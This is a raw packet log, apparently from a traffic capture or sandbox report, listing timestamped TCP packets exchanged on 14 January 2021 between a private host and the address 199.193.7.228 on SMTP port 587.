Jan 14, 2021 08:01:10.194740057 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.194763899 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.195019007 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.195100069 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.195544004 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.195628881 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.195856094 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.195931911 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.204092026 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.204310894 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.204329014 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.204413891 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.205804110 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.206840038 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.236681938 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.236710072 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.236717939 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.236871958 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.236932993 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.236968994 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.237004042 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.237098932 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.237517118 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.237615108 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.337225914 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.337258101 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.337342024 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.337363958 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.337481976 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.337743998 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.337815046 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.385217905 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.385346889 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.385551929 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.385656118 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.385718107 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.385886908 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.385951996 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.386023998 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.386028051 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.386094093 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.395844936 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.396447897 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.396770954 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.398899078 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.399353981 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.427194118 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.427223921 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.427369118 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.427406073 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.427491903 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.427658081 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.427674055 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.427881956 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.527569056 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.527719975 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.527738094 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.527805090 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.527822971 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.527967930 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.575474977 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.575601101 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.575623035 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.575640917 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.575684071 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.575706005 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.575814962 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.575915098 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.576052904 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.576128006 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.589471102 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.590322018 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.590843916 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.617542982 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.617564917 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.617680073 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.617701054 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.617713928 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.617732048 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.617733002 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.617840052 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.617844105 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.617851973 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.617857933 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.617865086 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.617902994 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.618067980 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.717928886 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.717953920 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.718046904 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.718167067 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.718219042 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.765697002 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.765873909 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.765885115 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.765899897 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.765958071 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.765994072 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.766109943 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.766185045 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.766201019 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.766263008 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.780966997 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.783561945 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.784110069 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.807897091 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.807925940 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.807935953 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.808092117 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.808135033 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.808157921 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.808234930 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.808531046 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.908276081 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.908309937 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.908484936 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.908548117 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.956089020 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.956104994 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.956118107 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.956238985 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.956264973 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.956315041 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.974241018 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.975579977 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.976140976 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.998326063 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.998492002 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.998513937 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.998528004 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.998677015 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:10.998853922 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:10.998980045 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.098732948 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.098762035 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.098896980 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.098928928 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.098987103 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.146336079 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.146362066 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.146378040 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.146437883 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.146447897 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.146455050 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.146497965 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.146528959 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.146682978 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.146836996 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.166186094 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.188846111 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.188874960 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.188924074 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.188940048 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.189018965 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.189070940 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.189138889 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.189156055 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.189228058 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.189316988 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.189498901 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.203660011 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.204348087 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.289967060 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.290002108 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.290115118 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.290193081 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.290246010 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.336652040 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.336677074 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.336687088 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.336812973 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.336877108 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.337295055 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.337419033 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.338958025 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.339097977 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.380678892 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.380706072 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.380938053 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.381016016 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.381431103 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.381443977 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.381577969 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.381639957 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.394469976 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.396730900 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.398049116 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.398256063 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.398521900 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.398878098 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.399107933 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.399296045 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.399549007 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.480360985 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.480467081 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.480606079 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.480668068 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.480716944 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.480942965 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.481138945 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.526907921 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.527010918 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.527021885 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.527693987 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.529123068 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.529154062 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.571070910 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.571108103 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.571552038 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.571568966 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.571605921 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.571894884 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.588193893 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.588223934 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.588421106 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.588452101 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.588782072 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.588859081 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.589065075 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.589154959 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.589165926 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.589266062 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.589380026 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.589404106 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.589512110 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.589607000 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.590034008 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.671890974 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.671931982 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.672000885 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.689953089 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.732562065 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.780355930 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.780385017 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.780395985 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.780499935 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.780574083 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.780668020 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.780731916 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.780967951 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.781915903 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.781996965 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.935939074 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.971528053 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.971716881 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.972265959 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.972372055 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.972528934 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.972579002 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.972667933 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.973392963 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.973563910 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.973582029 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:11.975152969 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:11.975277901 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.127947092 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.127984047 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.127998114 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.128109932 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.128813982 CET	49788	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.164102077 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.164141893 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.164167881 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.164191008 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.164227009 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.164233923 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.164246082 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.164385080 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.164491892 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.165477037 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.167351961 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.167381048 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.178432941 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.178668022 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.178900957 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.179188013 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.179380894 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.179510117 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.179704905 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.179833889 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.194356918 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.195133924 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.195712090 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.196417093 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.196867943 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.197247028 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.197580099 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.210501909 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.318948030 CET	587	49788	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.354693890 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.354727983 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.354854107 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.354938984 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.355063915 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.355093002 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.355290890 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.355367899 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.355403900 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.355516911 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.355556965 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.364022970 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.368633032 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.368668079 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.368988037 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.369261980 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.369453907 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.369538069 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.369741917 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.369817019 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.384735107 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.385205984 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.385787964 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.386518002 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.386832952 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.387232065 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.387636900 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.400933027 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.401371956 CET	587	49789	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.401453018 CET	587	49790	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.401478052 CET	49789	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.452640057 CET	49790	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.557141066 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.557307005 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.748764992 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.749078989 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:12.939075947 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.939315081 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:12.939600945 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:13.129544020 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.130140066 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:13.320028067 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.320146084 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.320173025 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.320250988 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:13.321939945 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:13.323096037 CET	49791	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:01:13.511817932 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.511840105 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.512861967 CET	587	49791	199.193.7.228	192.168.2.3
Jan 14, 2021 08:01:13.513489008 CET	587	49791	199.193.7.228	192.168.2.3
